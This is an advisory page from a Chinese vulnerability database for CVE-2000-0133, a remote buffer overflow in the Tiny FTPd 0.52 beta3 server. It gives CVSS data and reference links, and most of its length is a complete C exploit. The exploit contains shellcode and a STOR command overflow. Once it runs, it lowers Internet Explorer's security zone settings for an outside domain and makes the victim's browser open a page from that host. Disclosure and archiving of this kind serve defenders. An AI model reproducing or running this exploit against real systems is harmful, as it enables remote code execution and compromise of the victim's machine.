CVE-2000-0133
CVSS10.0
发布时间 :2000-02-01 00:00:00
修订时间 :2008-09-10 15:03:05
NMCOES    

[原文]Buffer overflows in Tiny FTPd 0.52 beta3 FTP server allows users to execute commands via the STOR, RNTO, MKD, XMKD, RMD, XRMD, APPE, SIZE, and RNFR commands.


[CNNVD]Tiny FTPd多个缓冲区溢出漏洞(CNNVD-200002-005)

        Tiny FTPd 0.52 测试版3 FTP服务器存在缓冲区溢出漏洞。用户可以借助STOR, RNTO, MKD, XMKD, RMD, XRMD, APPE, SIZE,和 RNFR命令执行命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0133
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0133
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200002-005
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/961
(UNKNOWN)  BID  961

- 漏洞信息

Tiny FTPd多个缓冲区溢出漏洞
危急 缓冲区溢出
2000-02-01 00:00:00 2005-10-20 00:00:00
远程※本地  
        Tiny FTPd 0.52 测试版3 FTP服务器存在缓冲区溢出漏洞。用户可以借助STOR, RNTO, MKD, XMKD, RMD, XRMD, APPE, SIZE,和 RNFR命令执行命令。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息 (19737)

H. Nomura Tiny FTPDaemon 0.52 Multiple Buffer Overflow Vulnerabilities (EDBID:19737)
windows remote
2000-02-01 Verified
0 UNYUN
N/A [点击下载]
source: http://www.securityfocus.com/bid/961/info


Tiny FTPd is a freeware FTP server for Win9x with a Japanese interface. Version .52 and possible previous versions have unchecked buffers in the code that handles the following commands: APPE, MKD, RMD, RNFR, RNTO, SIZE, STOR, XMKD, and XRMD. With these overflows, an attacker can overwrite the stack and execute arbitrary code. 

This exploit will use the STOR overflow to create a registry key named 'backsection.net' in
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ In that key it will create an entry named "http" with a value of "0". This will set IE to not apply security settings against pages coming from backsection.net . The exploit then starts IE and loads http://shadowpenguin.backsection.net/ocx/sample.html . ActiveX code will then pop up a message box.

This exploit was only tested on Windows 98 with IE5. Usage under Windows NT will require some editing of the registry key location. 

/*=========================================================================
====
   Tiny FTPd 0.52 beta3 exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =========================================================================
====
*/

#include    <stdio.h>
#include    <string.h>
#include    <windows.h>
#include    <winsock.h>

#define     FTP_PORT        21
#define     MAXBUF          2000
#define     MAXPACKETBUF    32000
#define     RETADR          268
#define     JMPESP_1        0xff
#define     JMPESP_2        0xe4
#define     NOP             0x90
#define     KERNEL_NAME     "kernel32.dll"

static unsigned char exploit_code[1000]={
0xEB,0x67,0x5F,0x33,0xC0,0x88,0x47,0x0C,0x88,0x47,0x18,0x88,0x47,0x26,0x88,
0x47,
0x34,0x88,0x47,0x43,0x88,0x47,0x51,0x88,0x47,0x56,0x89,0x47,0x57,0x33,0xDB,
0xB3,
0xB8,0x03,0xDF,0x88,0x03,0x43,0x88,0x43,0x07,0x88,0x43,0x20,0x57,0xB8,0x50,
0x77,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x19,0x03,0xDF,0x53,0x56,0xB8,
0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xD2,0xB2,0x5B,0x03,0xD7,0x52,0xBA,0xFF,0xFF,
0xFF,
0xFF,0x52,0x33,0xC9,0x51,0x33,0xD2,0xB2,0x63,0x03,0xD7,0x52,0xB1,0x01,0xC1,
0xE1,
0x1F,0x80,0xC9,0x03,0x51,0xFF,0xD0,0xEB,0x02,0xEB,0x5B,0x33,0xDB,0xB3,0x27,
0x03,
0xDF,0x53,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xD2,0xB2,0x5F,0x03,
0xD7,
0x52,0x33,0xD2,0xB2,0xB9,0x03,0xD7,0x52,0x33,0xD2,0xB2,0x5B,0x03,0xD7,0x8B,
0x1A,
0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x35,0x03,0xDF,0x53,0x56,0xB8,0x28,0x6E,0xF7,
0xBF,
0xFF,0xD0,0x33,0xC9,0xB1,0x04,0x51,0x33,0xD2,0xB2,0x57,0x03,0xD7,0x52,0x51,
0x33,
0xD2,0x52,0x33,0xD2,0xB2,0x52,0x03,0xD7,0x52,0x33,0xD2,0xB2,0x5F,0x03,0xD7,
0x8B,
0x1A,0x53,0xFF,0xD0,0xEB,0x02,0xEB,0x38,0x33,0xDB,0xB3,0x0C,0xFE,0xC3,0x03,
0xDF,
0x53,0xB8,0x50,0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x44,0x03,
0xDF,
0x53,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x01,0x53,0x33,
0xDB,
0x53,0x53,0x33,0xC9,0xB1,0xC1,0x03,0xCF,0x51,0x53,0x53,0xFF,0xD0,0x90,0xEB,
0xFD,
0xE8,0xFD,0xFE,0xFF,0xFF,0x00};

#define WORKAREA    \
"advapi32.dll*shell32.dll*RegOpenKeyExA*RegCreateKeyA*"\
"RegSetValueExA*ShellExecuteA*http*000011112222.DEFAULT"\
"\\Software\\Microsoft\\Windows\\CurrentVersion"\
"\\Internet Settings\\ZoneMap\\Domains\\*"

#define DOMAIN  "backsection.net"
#define URL     "http://shadowpenguin.backsection.net/ocx/sample.html"

unsigned int search_mem(unsigned char *st,unsigned char *ed,
                unsigned char c1,unsigned char c2)
{
    unsigned char   *p;
    unsigned int    adr;

    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2){
            adr=(unsigned int)p;
            if ((adr&0xff)==0) continue;
            if (((adr>>8)&0xff)==0) continue;
            if (((adr>>16)&0xff)==0) continue;
            if (((adr>>24)&0xff)==0) continue;
            return(adr);
        }
    return(0);
}

main(int argc,char *argv[])
{
    SOCKET               sock;
    SOCKADDR_IN          addr;
    WSADATA              wsa;
    WORD                 wVersionRequested;
    unsigned int         i,kp,ip,p1,p2,p;
    unsigned int         pretadr;
    static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
    struct hostent       *hs;
    MEMORY_BASIC_INFORMATION meminfo;

    if (argc<3){
        printf("usage: %s VictimHost UserName Password\n",argv[0]);
        exit(1);
    }
    if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){
        printf("Can not find %s\n",KERNEL_NAME);
        exit(1);
    }

    VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
    pretadr=0;
    for (i=0;i<meminfo.RegionSize;i++){
        p=kp+i;
        if ( ( p     &0xff)==0
          || ((p>>8 )&0xff)==0
          || ((p>>16)&0xff)==0
          || ((p>>24)&0xff)==0) continue;
        if (*((unsigned char *)p)==JMPESP_1 && *(((unsigned char *)p)+1)==
JMPESP_2) pretadr=p;
    }
    printf("RETADR         : %x\n",pretadr);
    if (pretadr==0){
        printf("Can not find codes which are used by exploit.\n");
        exit(1);
    }

    wVersionRequested = MAKEWORD( 2, 0 );
    if (WSAStartup(wVersionRequested , &wsa)!=0){
        printf("Winsock Initialization failed.\n"); return -1;
    }
    if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
        printf("Can not create socket.\n"); return -1;
    }
    addr.sin_family     = AF_INET;
    addr.sin_port       = htons((u_short)FTP_PORT);
    if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
            if ((hs=gethostbyname(argv[1]))==NULL){
                printf("Can not resolve specified host.\n"); return -1;
            }
            addr.sin_family = hs->h_addrtype;
            memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
    }
    if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
        printf("Can not connect to specified host.\n"); return -1;
    }
    recv(sock,packetbuf,MAXPACKETBUF,0);
    sprintf(packetbuf,"user %s\r\n",argv[2]);
    send(sock,packetbuf,strlen(packetbuf),0);
    recv(sock,packetbuf,MAXPACKETBUF,0);
    sprintf(packetbuf,"pass %s\r\n",argv[3]);
    send(sock,packetbuf,strlen(packetbuf),0);
    recv(sock,packetbuf,MAXPACKETBUF,0);

    memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;

    ip=pretadr;
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;

    p1=(unsigned int)GetProcAddress((HINSTANCE)kp,"LoadLibraryA");
    p2=(unsigned int)GetProcAddress((HINSTANCE)kp,"GetProcAddress");

    printf("LoadLibraryA   : %x\n",p1);
    printf("GetProcAddress : %x\n",p2);
    if ( ( p1     &0xff)==0
      || ((p1>>8 )&0xff)==0
      || ((p1>>16)&0xff)==0
      || ((p1>>24)&0xff)==0
      || ( p2     &0xff)==0
      || ((p2>>8 )&0xff)==0
      || ((p2>>16)&0xff)==0
      || ((p2>>24)&0xff)==0){
        printf("NULL code is included.\n");
        exit(1);
    }
    exploit_code[0x28]=strlen(DOMAIN);
    exploit_code[0x2B]=strlen(URL)+strlen(DOMAIN)+1;
    exploit_code[0xf5]=strlen(DOMAIN)+186;

    exploit_code[0x2e]=exploit_code[0xd2]=p1&0xff;
    exploit_code[0x2f]=exploit_code[0xd3]=(p1>>8)&0xff;
    exploit_code[0x30]=exploit_code[0xd4]=(p1>>16)&0xff;
    exploit_code[0x31]=exploit_code[0xd5]=(p1>>24)&0xff;
    exploit_code[0x3f]=exploit_code[0x74]=p2&0xff;
    exploit_code[0x40]=exploit_code[0x75]=(p2>>8)&0xff;
    exploit_code[0x41]=exploit_code[0x76]=(p2>>16)&0xff;
    exploit_code[0x42]=exploit_code[0x77]=(p2>>24)&0xff;
    exploit_code[0x9c]=exploit_code[0xe3]=p2&0xff;
    exploit_code[0x9d]=exploit_code[0xe4]=(p2>>8)&0xff;
    exploit_code[0x9e]=exploit_code[0xe5]=(p2>>16)&0xff;
    exploit_code[0x9f]=exploit_code[0xe6]=(p2>>24)&0xff;

    strcat(exploit_code,WORKAREA);
    strcat(exploit_code,DOMAIN);
    strcat(exploit_code,"*");
    strcat(exploit_code,URL);

    memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));

    sprintf(packetbuf,"stor %s\r\n",buf);
    send(sock,packetbuf,strlen(packetbuf),0);
    Sleep(3000);
    closesocket(sock);
    printf("Done.\n");
    return FALSE;
}
		

- 漏洞信息

74
Tiny FTPd Multiple Command Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

A remote overflow exists in Tiny FTPd. Multiple commands fail to validate user-supplied input resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2000-02-01 Unknow
2000-02-01 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Tiny FTPd Multiple Buffer Overflow Vulnerabilities
Unknown 961
Yes Yes
2000-02-01 12:00:00 2009-07-11 01:56:00
Discovered by UNYUN <shadowpenguin@BACKSECTION.NET>, posted to Bugtraq-JP onJanuary 27, 2000. Translation posted to Bugtraq by Nobuo Miwa.

- 受影响的程序版本

H. Nomura Tiny FTPDaemon 0.52

- 漏洞讨论

Tiny FTPd is a freeware FTP server for Win9x with a Japanese interface. Version .52 and possible previous versions have unchecked buffers in the code that handles the following commands: APPE, MKD, RMD, RNFR, RNTO, SIZE, STOR, XMKD, and XRMD. With these overflows, an attacker can overwrite the stack and execute arbitrary code.

- 漏洞利用

This exploit will use the STOR overflow to create a registry key named 'backsection.net' in
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ In that key it will create an entry named "http" with a value of "0". This will set IE to not apply security settings against pages coming from backsection.net . The exploit then starts IE and loads http://shadowpenguin.backsection.net/ocx/sample.html . ActiveX code will then pop up a message box.

This exploit was only tested on Windows 98 with IE5. Usage under Windows NT will require some editing of the registry key location.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站